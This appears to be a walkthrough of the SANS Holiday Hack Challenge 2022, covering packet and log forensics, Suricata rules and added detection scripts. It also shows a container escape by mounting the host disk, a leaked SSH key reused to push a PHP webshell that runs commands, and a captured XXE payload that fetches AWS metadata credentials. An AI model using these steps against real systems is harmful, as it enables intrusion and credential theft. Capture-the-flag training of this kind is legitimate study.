SANS Holiday Hack Challenge 2022 / KringleCon

Before Starting

Objective 1) KringleCon Orientation

This is the initial tutorial and setup to play the SANS Holiday Hack Challenge.

  • Talk to Jingle Ringford: click on the elf.
  • Get your badge: click on the yellow circles on your avatar.
  • Create a wallet: click on the wallet machine and copy/paste your WalletAddress and Key in a file. KEEP IT!
  • Use the terminal: click the computer terminal, enter the answer and press Enter.

You can now enter the challenge by following the path between the Wallet machine and the Cranberry Pi terminal.

Five Rings for the Christmas king immersed in cold

Story

Click on Santa Claus.

Each Ring now missing from its zone

Story

💡 In North Pole: Walk and enter the house with the open door. Enter the Hall of Talks. Go to the extreme left. You will find a Hidden Chest with 13 KringleCoins and a Hint for the Blockchain Divination Objective. Click Take All Items.

Go right and down the ladder. Then go right and enter the Tolkien Ring room. There will be a Cranberry Pi terminal (Wireshark Phishing).

Objective 2) Recover the Tolkien Ring

Wireshark Practice – Cranberry Pi Terminal Wireshark Phishing (Sparkle Redberry)

Go to the Tolkien Ring room, talk to Sparkle Redberry to download the suspicious.pcap file. Open the suspicious.pcap file in Wireshark. Click on the terminal:

Can you help me? yes
1. There are objects in the PCAP that can be exported by Wireshark and/or Tshark. What type of objects can be exported from this PCAP? HTTP

In Wireshark, click File->Export Objects. Choose HTTP and you can see a list of objects. Click Save All.

2. What is the file name of the largest file we can export? app.php
3. What packet number starts that app.php file? 687

Click on packet 687 to see the IP.

4. What is the IP of the Apache server? 192.185.57.242
5. What file is saved to the infected host? Ref_Sept24-2020.zip

Open the app(1).php file. We can see the filename Ref_Sept24-2020.zip.

6. Attackers used bad TLS certificates in this traffic. Which countries were they registered to?
Israel, South Sudan, United States

Enter tls in the display filter. Click Edit->Find Packet…. Search for the string “Server Hello, Certificate”.

Packet 712: Issuer CountryName US (United States)
Packet 808: Issuer CountryName IL (Israel)
Packet 3903: Issuer CountryName SS (South Sudan)
7. Is the host infected (Yes/No)? Yes

Click on Sparkle Redberry. You get the hint Event Logs Exposé.

New to Windows event logs? Get a jump start with Eric’s talk!

Talk to Dusty Giftwrap for the next objective.

Windows Event Logs

Event Logs Exposé Hint from Sparkle Redberry

Download the event_log file from the Objectives menu or use the terminal.

Ready to begin? yes
1. What month/day/year did the attack take place?
12/24/2022
head powershell.evtx.log
2. An attacker got a secret from a file. What was the original file's name?
Recipe.txt
grep .txt powershell.evtx.log
3. The contents of the previous file were retrieved, changed, and stored to a variable by the attacker. This was done multiple times. Submit the last full PowerShell line that performed only these actions.

$foo = Get-Content .\Recipe| % {$_ -replace 'honey', 'fish oil'} $foo | Add-Content -Path 'recipe_updated.txt'
grep -e ".*\$.*=.*" powershell.evtx.log
grep \$foo powershell.evtx.log
4. After storing the altered file contents into the variable, the attacker used the variable to run a separate command that wrote the modified data to a file. This was done multiple times. Submit the last full PowerShell line that performed only this action.

$foo | Add-Content -Path 'Recipe'
grep \$foo powershell.evtx.log
5. The attacker ran the previous command against one file multiple times. What is the name of this file?
Recipe.txt
grep \$foo powershell.evtx.log
6. Were any files deleted? (Yes/No)
Yes
7. Was the original file (from question 2) deleted? (Yes/No)
No
8. What is the Event ID of the logs that show the actual command lines the attacker typed and ran?
4104
# Event ID is in the line before del .\recipe_updated.txt
grep -B100 del powershell.evtx.log
9. Is the secret ingredient compromised (Yes/No)?
Yes
10. What is the secret ingredient?
honey
grep secret powershell.evtx.log

Click on Dusty Giftwrap to get Hints for The Tome of Suricata Rules. We get this link to Suricata rule creation.

Talk to Fitzy Shortstack for the next objective.

Suricata Regatta

Help detect this kind of malicious activity in the future by writing some Suricata rules. Work with Dusty Giftwrap in the Tolkien Ring to get some hints.

  • Rules: “action” “header” “rule options”
  • Actions: alert, pass, drop, reject, rejectsrc, rejectdst, rejectboth.
  • Protocols: tcp, udp, icmp, ip (“all” or “any”), http, ftp, dns, etc.
First, please create a Suricata rule to catch DNS lookups for adv.epostoday.uk.
Whenever there's a match, the alert message (msg) should read Known bad DNS lookup, possible Dridex infection.
Add your rule to suricata.rules

First Rule:

alert dns $HOME_NET any -> any any (msg:"Known bad DNS lookup, possible Dridex infection"; dns.query; content:"adv.epostoday.uk"; sid:1;)
./rule_checker
STINC thanks you for your work with that DNS record! In this PCAP, it points to 192.185.57.242.
Develop a Suricata rule that alerts whenever the infected IP address 192.185.57.242 communicates with internal systems over HTTP.
When there's a match, the message (msg) should read Investigate suspicious connections, possible Dridex infection

Second Rule:

alert http 192.185.57.242 any <> any any (msg:"Investigate suspicious connections, possible Dridex infection"; sid:123;)
./rule_checker
We heard that some naughty actors are using TLS certificates with a specific CN.
Develop a Suricata rule to match and alert on an SSL certificate for heardbellith.Icanwepeh.nagoya.
When your rule matches, the message (msg) should read Investigate bad certificates, possible Dridex infection

Third Rule:

alert tls any any <> any any (msg:"Investigate bad certificates, possible Dridex infection"; tls.cert_subject; content:"heardbellith.Icanwepeh.nagoya"; sid:456;)
./rule_checker
OK, one more to rule them all and in the darkness find them.
Let's watch for one line from the JavaScript: let byteCharacters = atob
Oh, and that string might be GZip compressed - I hope that's OK!
Just in case they try this again, please alert on that HTTP data with message Suspicious JavaScript function, possible Dridex infection

Fourth Rule:

alert http any any <> any any (msg:"Suspicious JavaScript function, possible Dridex infection"; http.accept_enc; http.response_body; content:"let byteCharacters = atob"; sid:789;)
./rule_checker
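As an added illustration (not code from the challenge or its rule_checker), this Python script takes the four rules above apart into action, header and options as the bullet list describes, lints for what Suricata insists on (a msg, a unique sid), and shows why the fourth rule matches on http.response_body: the JavaScript string is absent from the gzip-compressed wire bytes and only appears after decompression. The DNS rule carries a sid:1 added here, and the compressed response body is constructed.

```python
import gzip
import re

# The four rules from this write-up, used as sample input (sid:1 added here to the
# DNS rule, since Suricata requires every rule to carry a sid).
RULES = [
    'alert dns $HOME_NET any -> any any (msg:"Known bad DNS lookup, possible Dridex infection"; dns.query; content:"adv.epostoday.uk"; sid:1;)',
    'alert http 192.185.57.242 any <> any any (msg:"Investigate suspicious connections, possible Dridex infection"; sid:123;)',
    'alert tls any any <> any any (msg:"Investigate bad certificates, possible Dridex infection"; tls.cert_subject; content:"heardbellith.Icanwepeh.nagoya"; sid:456;)',
    'alert http any any <> any any (msg:"Suspicious JavaScript function, possible Dridex infection"; http.accept_enc; http.response_body; content:"let byteCharacters = atob"; sid:789;)',
]
SAMPLE_WIRE = gzip.compress(b"<script>let byteCharacters = atob(payload);</script>")  # constructed
# Rule anatomy: action, then the header (proto src sport dir dst dport), then (options).
HEADER_RE = re.compile(
    r"^(?P<action>\w+)\s+(?P<proto>\w+)\s+(?P<src>\S+)\s+(?P<sport>\S+)\s+"
    r"(?P<dir>->|<>)\s+(?P<dst>\S+)\s+(?P<dport>\S+)\s*\((?P<opts>.*)\)\s*$")
ACTIONS = {"alert", "pass", "drop", "reject", "rejectsrc", "rejectdst", "rejectboth"}
OPT_SPLIT = re.compile(r';(?=(?:[^"]*"[^"]*")*[^"]*$)')  # ';' outside quoted values


def parse_rule(rule):
    """Header fields plus an ordered [(keyword, value or None)] list of options."""
    m = HEADER_RE.match(rule.strip())
    if not m:
        raise ValueError("not a Suricata rule: " + rule)
    fields = m.groupdict()
    options = []
    for raw in OPT_SPLIT.split(fields.pop("opts")):
        raw = raw.strip()
        if raw:
            key, _, value = raw.partition(":")
            options.append((key.strip(), value.strip().strip('"') if value else None))
    fields["options"] = options
    return fields


def lint_rules(rules):
    """Problems a rule checker would flag: bad action, missing msg or sid, duplicate sid."""
    problems, seen = [], set()
    for rule in rules:
        r = parse_rule(rule)
        keys = dict(r["options"])
        if r["action"] not in ACTIONS:
            problems.append("unknown action " + r["action"])
        if "msg" not in keys:
            problems.append("rule has no msg")
        if "sid" not in keys:
            problems.append("rule has no sid")
        elif keys["sid"] in seen:
            problems.append("duplicate sid " + keys["sid"])
        seen.add(keys.get("sid"))
    return problems


def response_body_has(needle, raw_body, content_encoding=None):
    """What the http.response_body buffer inspects: the body after Suricata's HTTP
    decompression. A match against the raw gzip bytes would miss the string."""
    body = gzip.decompress(raw_body) if content_encoding == "gzip" else raw_body
    return needle.encode() in body
```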

The first with bread kindly given, not sold

Story

Click on Fitzy Shortstack to complete the objective.

💡 OBJECTIVE COMPLETED

Go into the Elfen Ring room.

Objective 3) Recover the Elfen Ring

Clone with a Difference – Cranberry Pi Terminal Prison Escape (Bow Ninecandle)

Go to the Elfen Room and talk to Bow Ninecandle. See this documentation.

We just need you to clone one repo: git clone git@haugfactory.com:asnowball/aws_scripts.git 
This should be easy, right?

Thing is: it doesn't seem to be working for me. This is a public repository though. I'm so confused!

Please clone the repo and cat the README.md file.
Then runtoanswer and tell us the last word of the README.md file!
git clone https://haugfactory.com/asnowball/aws_scripts.git
tail -n 1 aws_scripts/README.md
runtoanswer
maintainers

Talk to Bow Ninecandle.

When users are over-privileged, they can often act as root. When containers have too many permissions, they can affect the host!

Hint Over-Permissioned from Bow Ninecandle

Were you able to mount up? If so, users’ home/ directories can be a great place to look for secrets…

Hint Mount Up and Ride from Bow Ninecandle

Talk to Tinsel Upatree.

Prison Escape

Greetings Noble Player, 

You find yourself in a jail with a recently captured Dwarven Elf.

He desperately asks your help in escaping for he is on a quest to aid a friend in a search for treasure inside a crypto-mine. 

If you can help him break free of his containment, he claims you would receive "MUCH GLORY!"

Please, do your best to un-contain yourself and find the keys to both of your freedom.
whoami
samways
sudo -l
User samways may run the following commands on grinchum-land:
    (ALL) NOPASSWD: ALL
sudo su -
root

See HackTricks to mount the host filesystem.

fdisk -l
mkdir -p /mnt/escape
mount /dev/vda /mnt/escape
cd /mnt/escape/

Look for keys

cd /mnt/escape/home/jailer/.ssh
cat jail.key.priv
082bb339ec19de4935867

Secret: 082bb339ec19de4935867

Talk to Tinsel Upatree for the next objective.

The thing about Git is that every step of development is accessible – even steps you didn’t mean to take! git log can show code skeletons.

Hint Commiting to Mistakes from Tinsel Upatree

If you find a way to impersonate another identity, you might try re-cloning a repo with their credentials.

Hint Switching Hats from Tinsel Upatree

Jolly CI/CD

See Jared Folkins, DevOps Faux Paws | KringleCon 2022.

Greetings Noble Player, 

Many thanks for answering our desperate cry for help!

You may have heard that some evil Sporcs have opened up a web-store selling 
counterfeit banners and flags of the many noble houses found in the land of 
the North! They have leveraged some dastardly technology to power their 
storefront, and this technology is known as PHP! 

***gasp*** 

This storefront utilizes a truly despicable amount of resources to keep the 
website up. And there is only a certain type of Christmas Magic capable of 
powering such a thing… an Elfen Ring!

Along with PHP there is something new we've not yet seen in our land. 
A technology called Continuous Integration and Continuous Deployment! 

Be wary! 

Many fair elves have suffered greatly but in doing so, they've managed to 
secure you a persistent connection on an internal network. 

BTW take excellent notes! 

Should you lose your connection or be discovered and evicted the 
elves can work to re-establish persistence. In fact, the sound of fans
and the sag in lighting tells me all the systems are booting up again right now.  

Please, for the sake of our Holiday help us recover the Ring and save Christmas!

❗ You might need to wait if you get an error when trying to clone.

git clone http://gitlab.flag.net.internal/rings-of-powder/wordpress.flag.net.internal.git
cd wordpress.flag.net.internal/
git log
git show e19f653bde9ea3de6af21a587e41e7a909db1ca5
commit e19f653bde9ea3de6af21a587e41e7a909db1ca5
Author: knee-oh <sporx@kringlecon.com>
Date:   Tue Oct 25 13:42:54 2022 -0700

    whoops

diff --git a/.ssh/.deploy b/.ssh/.deploy
deleted file mode 100644
index 3f7a9e3..0000000
--- a/.ssh/.deploy
+++ /dev/null
@@ -1,7 +0,0 @@
------BEGIN OPENSSH PRIVATE KEY-----
-b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAMwAAAAtzc2gtZW
-QyNTUxOQAAACD+wLHSOxzr5OKYjnMC2Xw6LT6gY9rQ6vTQXU1JG2Qa4gAAAJiQFTn3kBU5
-9wAAAAtzc2gtZWQyNTUxOQAAACD+wLHSOxzr5OKYjnMC2Xw6LT6gY9rQ6vTQXU1JG2Qa4g
-AAAEBL0qH+iiHi9Khw6QtD6+DHwFwYc50cwR0HjNsfOVXOcv7AsdI7HOvk4piOcwLZfDot
-PqBj2tDq9NBdTUkbZBriAAAAFHNwb3J4QGtyaW5nbGVjb24uY29tAQ==
------END OPENSSH PRIVATE KEY-----
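Review bot: deleting .ssh/.deploy in this hunk does not remove the private key from the repository; the blob stays reachable through this commit (git show e19f653bde9ea3de6af21a587e41e7a909db1ca5 prints it in full, as the steps below use). The key has to be treated as compromised and rotated, and the deploy key revoked on the GitLab project; if the history itself must be cleaned, that takes a history rewrite (git filter-repo or similar) plus a force push, not a delete commit. A .ssh/ directory inside the working tree also suggests the repository has no .gitignore entry for key material.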
diff --git a/.ssh/.deploy.pub b/.ssh/.deploy.pub
deleted file mode 100644
index 8c0b43c..0000000
--- a/.ssh/.deploy.pub
+++ /dev/null
@@ -1 +0,0 @@
-ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIP7AsdI7HOvk4piOcwLZfDotPqBj2tDq9NBdTUkbZBri sporx@kringlecon.com
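Review bot: removing .deploy.pub here is cosmetic: the matching private key was already published by the previous hunk, and the public half stays registered wherever it was installed (the GitLab deploy key or an authorized_keys entry for sporx@kringlecon.com, going by the key comment). Revoke it there; until that happens the leaked private key keeps granting push access to this repository.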

Copy the private key to a file and re-clone the repository.

git show e19f653bde9ea3de6af21a587e41e7a909db1ca5 | grep -A6 "BEGIN OPENSSH PRIVATE KEY" > /home/samways/id_rsa

❗ REMOVE THE HYPHENS AT THE BEGINNING OF EACH LINE!

-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAMwAAAAtzc2gtZW
QyNTUxOQAAACD+wLHSOxzr5OKYjnMC2Xw6LT6gY9rQ6vTQXU1JG2Qa4gAAAJiQFTn3kBU5
9wAAAAtzc2gtZWQyNTUxOQAAACD+wLHSOxzr5OKYjnMC2Xw6LT6gY9rQ6vTQXU1JG2Qa4g
AAAEBL0qH+iiHi9Khw6QtD6+DHwFwYc50cwR0HjNsfOVXOcv7AsdI7HOvk4piOcwLZfDot
PqBj2tDq9NBdTUkbZBriAAAAFHNwb3J4QGtyaW5nbGVjb24uY29tAQ==
-----END OPENSSH PRIVATE KEY-----
chmod 600 /home/samways/id_rsa
rm -rf wordpress.flag.net.internal
GIT_SSH_COMMAND='ssh -i /home/samways/id_rsa' git clone ssh://git@gitlab.flag.net.internal/rings-of-powder/wordpress.flag.net.internal.git

Create a webshell web.php in the wordpress.flag.net.internal directory.

<?php echo "<p>Hacked</p>";?>
<?php passthru($_REQUEST[myprecious]); ?>
git config --global user.name "Hacker"
git add web.php
git commit -m "Adding a webshell"
GIT_SSH_COMMAND='ssh -i /home/samways/id_rsa' git push origin main
curl --head "http://wordpress.flag.net.internal/web.php"
HTTP/1.1 200 OK
Date: Thu, 22 Dec 2022 22:02:13 GMT
Server: Apache/2.4.54 (Debian)
X-Powered-By: PHP/7.4.32
Content-Type: text/html; charset=UTF-8
curl --data "myprecious=whoami" "http://wordpress.flag.net.internal/web.php"
curl --data "myprecious=ls%20/" "http://wordpress.flag.net.internal/web.php"

We find a file called flag.txt!

curl --data "myprecious=cat%20/flag.txt" "http://wordpress.flag.net.internal/web.php"
Congratulations! You've found the HHC2022 Elfen Ring!
oI40zIuCcN8c3MhKgQjOMN8lfYtVqcKT
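The "whoops" commit is the lesson of this objective: a secret deleted in a later commit is still in the history. As an added example (not part of the write-up or the challenge), this Python scanner walks git log -p --all output and reports every commit that added or removed a private-key header, so the deletion commit is caught as well as the one that introduced the key. The sample log is constructed from the shape of the commit above, with the key body abbreviated and a second, made-up commit id.

```python
import re
import subprocess

# Constructed `git log -p --all` excerpt, modelled on the 'whoops' commit in this
# write-up (key body abbreviated to one line; the second commit and its id are made up).
SAMPLE_LOG = """\
commit e19f653bde9ea3de6af21a587e41e7a909db1ca5

    whoops

diff --git a/.ssh/.deploy b/.ssh/.deploy
--- a/.ssh/.deploy
+++ /dev/null
@@ -1,7 +0,0 @@
------BEGIN OPENSSH PRIVATE KEY-----
-b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAMwAAAAtzc2gtZW
------END OPENSSH PRIVATE KEY-----
commit 1111111111111111111111111111111111111111

    add deploy key

diff --git a/.ssh/.deploy b/.ssh/.deploy
--- /dev/null
+++ b/.ssh/.deploy
@@ -0,0 +1,7 @@
+-----BEGIN OPENSSH PRIVATE KEY-----
+-----END OPENSSH PRIVATE KEY-----
"""

COMMIT_RE = re.compile(r"^commit ([0-9a-f]{40})")
FILE_RE = re.compile(r"^diff --git a/(\S+) b/")
FILE_HDR_RE = re.compile(r"^(---|\+\+\+) (a/|b/|/dev/null)")  # file headers, not hunk lines
KEY_RE = re.compile(r"-----BEGIN (?:[A-Z]+ )*PRIVATE KEY-----")  # OPENSSH, RSA, EC, plain


def find_leaked_keys(log_text):
    """[(commit, path, '+' or '-')] for every added or removed line that is a
    private-key header. A '-' hit matters as much as a '+': the deletion commit
    still leaves the key readable with `git show <commit>`."""
    commit = path = None
    hits = []
    for line in log_text.splitlines():
        m = COMMIT_RE.match(line)
        if m:
            commit = m.group(1)
            continue
        m = FILE_RE.match(line)
        if m:
            path = m.group(1)
            continue
        if line[:1] in ("+", "-") and not FILE_HDR_RE.match(line) and KEY_RE.search(line[1:]):
            hits.append((commit, path, line[0]))
    return hits


def scan_repo(repo_dir="."):
    """Same scan over every ref of a real checkout (git must be on PATH)."""
    log = subprocess.run(["git", "-C", repo_dir, "log", "-p", "--all"],
                         capture_output=True, text=True, check=True).stdout
    return find_leaked_keys(log)
```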

Another to find ‘ere pipelines get owned

Story

Talk to Rippin Proudboot.

💡 On the Web Ring floor, go to the extreme left. Then go up on the rope and try going left to reach a hidden chest. You will get 25 KringleCoins and a Hint for the Smart Contract Objective. Click Take All Items.

You’re going to need a Merkle Tree of your own. Math is hard. Professor Petabyte can help you out.

Merkle Tree Arboriculture Hint from the Hidden Chest

Objective 4) Recover the Web Ring

Enter the Web Ring room. Talk to Alabaster Snowball.

Naughty IP

Use the artifacts from Alabaster Snowball to analyze this attack on the Boria mines. Most of the traffic to this site is nice, but one IP address is being naughty! Which is it? Visit Sparkle Redberry in the Tolkien Ring for hints.

Download the file and unzip it.

https://storage.googleapis.com/hhc22_player_assets/boriaArtifacts.zip
unzip -d boria boriaArtifacts.zip

NOTE: The victim web server is 10.12.42.16 according to the Wireshark Top Talkers hint from Alabaster Snowball.

  • Open the victim.pcap file with Wireshark.
  • Click on menu Statistics -> Conversations.
  • Click on the IPv4 tab.
  • Click on Bytes to sort the conversations by number of bytes. The last address is 18.222.86.32.

Answer: 18.222.86.32

Talk to Alabaster Snowball.

Credential Mining

The first attack is a brute force login. What’s the first username tried?

  • Open the victim.pcap file using Wireshark.
  • In the Display filter bar, add http
  • Click on Edit -> Find Packet…
  • Choose String and enter POST /login.html.
  • Click Find. Packet 7279 is the first packet found.
  • Right-click on packet 7279, Follow -> HTTP Stream. Username is alice.
  • Additionally, searching for the string Cookie in the packet details, we see that packet 9319 (username=bob and password=passw0rd) sets the session cookie:
SiteCookie=eyJjb21wYW55IjoiTGVnaXRCcmVhZCIsImxldmVsIjoiYWRtaW4iLCJ1c2VyIjoiYm9iIn0.Yz208Q.Qk0Ek-PErRuhT4s3Be1ArGZKKv4

Answer: alice

404 FTW

The next attack is forced browsing where the naughty one is guessing URLs. What’s the first successful URL path in this attack?

Use the weberror.log file instead of the pcap file. Look for the first 200 OK page after a long run of 404 NOT FOUND responses.

grep -E "(404|200)+" weberror.log | grep -v /login.html | grep -v /aboutus.html | grep -v "GET / "
...
18.222.86.32 - - [05/Oct/2022 16:47:46] "GET /intro HTTP/1.1" 404 -
18.222.86.32 - - [05/Oct/2022 16:47:46] "GET /account HTTP/1.1" 404 -
18.222.86.32 - - [05/Oct/2022 16:47:46] "GET /x HTTP/1.1" 404 -
18.222.86.32 - - [05/Oct/2022 16:47:46] "GET /42 HTTP/1.1" 404 -
18.222.86.32 - - [05/Oct/2022 16:47:46] "GET /proc HTTP/1.1" 200 -
...

Answer: /proc
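The grep above finds the answer by eye; as an added example (not from the write-up), this Python script does the same detection over weberror.log lines automatically: per client it counts consecutive 404s and reports the first 2xx path a client reaches once it is a few guesses deep, which is the forced-browsing signature. The sample log is constructed in the format quoted above; the /proc run matches the real lines, the second client and the final /nope line are made up.

```python
import re
from collections import defaultdict

# Constructed sample in the weberror.log format quoted above (the /proc run is the
# one from the write-up; the other client and the final /nope line are made up).
SAMPLE_LOG = """\
18.222.86.32 - - [05/Oct/2022 16:45:00] "POST /login.html HTTP/1.1" 200 -
10.12.42.5 - - [05/Oct/2022 16:47:40] "GET / HTTP/1.1" 200 -
18.222.86.32 - - [05/Oct/2022 16:47:46] "GET /intro HTTP/1.1" 404 -
18.222.86.32 - - [05/Oct/2022 16:47:46] "GET /account HTTP/1.1" 404 -
18.222.86.32 - - [05/Oct/2022 16:47:46] "GET /x HTTP/1.1" 404 -
10.12.42.5 - - [05/Oct/2022 16:47:46] "GET /aboutus.html HTTP/1.1" 200 -
18.222.86.32 - - [05/Oct/2022 16:47:46] "GET /42 HTTP/1.1" 404 -
18.222.86.32 - - [05/Oct/2022 16:47:46] "GET /proc HTTP/1.1" 200 -
18.222.86.32 - - [05/Oct/2022 16:47:47] "GET /nope HTTP/1.1" 404 -
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) - - \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')


def parse_line(line):
    """One access-log line to a dict, or None for lines in another format."""
    m = LINE_RE.match(line)
    return m.groupdict() if m else None


def forced_browsing(log_text, threshold=3):
    """Track, per client, how many 404s it has received in a row (other clients'
    requests do not interrupt the run). When a client at least `threshold` deep
    in 404s then gets a 2xx, report that path as its first successful guess.
    Returns {ip: (path, number_of_404s_before_it)}, first hit per client only."""
    streak = defaultdict(int)
    findings = {}
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        ip = rec["ip"]
        if rec["status"] == "404":
            streak[ip] += 1
            continue
        if rec["status"].startswith("2") and streak[ip] >= threshold and ip not in findings:
            findings[ip] = (rec["path"], streak[ip])
        streak[ip] = 0  # any non-404 answer ends the run
    return findings
```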

IMDS, XXE, and Other Abbreviations

The last step in this attack was to use XXE to get secret keys from the IMDS service. What URL did the attacker force the server to fetch?

  • Open the victim.pcap file using Wireshark.
  • In the Display filter bar, add http
  • Click on Edit -> Find Packet…
  • Choose String and enter /proc.
  • Right-click on packet 26771, Follow -> HTTP Stream. Server response says Post XML here.
  • Replace the search String with POST /proc. Search until the last string is found; it should be packet 32918.
  • Right-click on packet 32918, Follow HTTP Stream.
POST /proc HTTP/1.1
Host: www.toteslegit.us
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:13.37) Gecko/20100101 Firefox/12.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Cookie: SiteCookie=eyJjb21wYW55IjoiTGVnaXRCcmVhZCIsImxldmVsIjoiYWRtaW4iLCJ1c2VyIjoiYm9iIn0.Yz21Ew.idT7R5CEcAB_uJD221WwmKYG5QM
Content-Type: application/xml
Content-Length: 226

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY id SYSTEM "http://169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance"> ]>
<product><productId>&id;</productId></product>
HTTP/1.1 200 OK
Server: Werkzeug/2.2.2 Python/3.8.10
Date: Wed, 05 Oct 2022 16:48:57 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 1595
Connection: close

<html><body>
<pre><product><productId>{
  "Code" : "Success",
  "LastUpdated" : "2022-10-05T16:43:21Z",
  "Type" : "AWS-HMAC",
  "AccessKeyId" : "ASIAV4AVRXQVJ267LD2Q",
  "SecretAccessKey" : "OpGR4v70ygZ3RFf4WTzjNL45pQayRwZgBUgd0LJT",
  "Token" : "[session token omitted]",
  "Expiration" : "2022-10-05T23:00:40Z"
}</productId></product></pre>
</body></html>

Answer: http://169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance
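The request body above is the whole attack: a DOCTYPE that declares an external entity pointing at the link-local metadata address, then a reference to it in a field the server echoes back. As an added detection example (not from the write-up), this Python script pulls every SYSTEM/PUBLIC entity out of a request body and grades it, treating a 169.254.0.0/16 target as an IMDS credential grab; the body is constructed in the same shape as the captured POST /proc. The fix on the server side is to reject DTDs altogether in the XML parser, and on the cloud side to require IMDSv2 so a server-side fetch without the session token returns nothing.

```python
import re
from ipaddress import ip_address
from urllib.parse import urlparse

# Constructed request body, the same shape as the POST /proc captured in victim.pcap.
SAMPLE_BODY = (
    '<?xml version="1.0" encoding="UTF-8"?>\n'
    '<!DOCTYPE foo [ <!ENTITY id SYSTEM "http://169.254.169.254/latest/meta-data/'
    'identity-credentials/ec2/security-credentials/ec2-instance"> ]>\n'
    "<product><productId>&id;</productId></product>"
)

# External entity declarations: SYSTEM "uri" or PUBLIC "pubid" "uri", general or % parameter.
ENTITY_RE = re.compile(
    r'<!ENTITY\s+(?:%\s+)?(?P<name>\w+)\s+'
    r'(?:SYSTEM\s+"(?P<sys>[^"]*)"|PUBLIC\s+"[^"]*"\s+"(?P<pub>[^"]*)")',
    re.IGNORECASE,
)


def external_entities(xml_text):
    """List (name, uri) for each external entity declared in the DOCTYPE."""
    return [(m.group("name"), m.group("sys") or m.group("pub"))
            for m in ENTITY_RE.finditer(xml_text)]


def classify_request(xml_text):
    """('imds', entities) when an external entity targets a link-local address such
    as 169.254.169.254; ('xxe', entities) for any other external entity (file:,
    http: to an internal host, ...); ('ok', []) when no external entity is declared."""
    ents = external_entities(xml_text)
    for _, uri in ents:
        host = urlparse(uri).hostname or ""
        try:
            if ip_address(host).is_link_local:
                return "imds", ents
        except ValueError:  # hostname is a name (or empty for file:), not an IP literal
            pass
    return ("xxe" if ents else "ok"), ents
```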

Talk to Alabaster Snowball for the next objective.

The locks take input, render some type of image, and process on the back end to unlock. To start, take a good look at the source HTML/JavaScript.

Hint Lock Mechanism from Alabaster Snowball

Developers use both client- and server-side input validation to keep out naughty input.

Hint Input Validation from Alabaster Snowball

Understanding how Content-Security-Policy works can help with this challenge.

Hint Content-Security-Policy from Alabaster Snowball

Open Boria Mine Door

Open the door to the Boria Mines. Help Alabaster Snowball in the Web Ring to get some hints for this challenge.

Talk to Hal Tandybuck. Click on the Boria Mine terminal.

Right-click on the application (CAPTCOA) and click Inspect. The locks are in iframes.

First lock

<!-- @&@&&W&&W&&&& -->

Enter @&@&&W&&W&&&& and click Go.

Second lock

<!-- TODO: FILTER OUT HTML FROM USER INPUT -->

Go to W3Schools to experiment with SVG rectangles.

<svg width="200" height="170">
  <rect width="200" height="170" style="fill:rgb(255,255,255);stroke-width:1;stroke:rgb(0,0,0)" />
</svg>

The lock is filled with a white rectangle and unlocks.

Third lock

<!-- TODO: FILTER OUT JAVASCRIPT FROM USER INPUT -->
<svg width="200" height="170">
   <circle cx="100" cy="100" r="200" stroke="blue" stroke-width="4" fill="blue" />
</svg>

The lock is filled with a huge blue circle and unlocks.

Fourth, fifth and sixth locks are optional.

Talk to Hal Tandybuck for the next objective.

Glamtariel’s Fountain

Stare into Glamtariel’s fountain and see if you can find the ring! What is the filename of the ring she presents you? Talk to Hal Tandybuck in the Web Ring for hints.

Talk to Akbowl.